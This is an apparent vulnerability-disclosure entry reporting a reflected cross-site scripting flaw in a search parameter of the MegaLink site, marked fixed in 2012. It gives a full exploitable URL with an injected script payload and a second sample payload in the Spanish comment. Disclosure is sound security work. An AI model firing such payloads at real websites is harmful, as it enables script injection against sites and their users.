...[<Vulnerability: 2201>]
Affected Entity: MegaLink
Actions: TweetMain URI: http://www.megalink.com
Type: Cross Site Scripting
Exploitable URI: http://www.megalink.com/guia_virtual/dir_busqueda.php?bus="><script>alert(/drv/)</script>
AnonyBrowse using Anonymouse
Status: Fixed
Date: Jan. 25, 2012, 11:42 a.m.
Comments:
XSS por método GET. La variable "bus" del formulario "form1" no filtra cadenas como : "><script>alert(document.write)</script>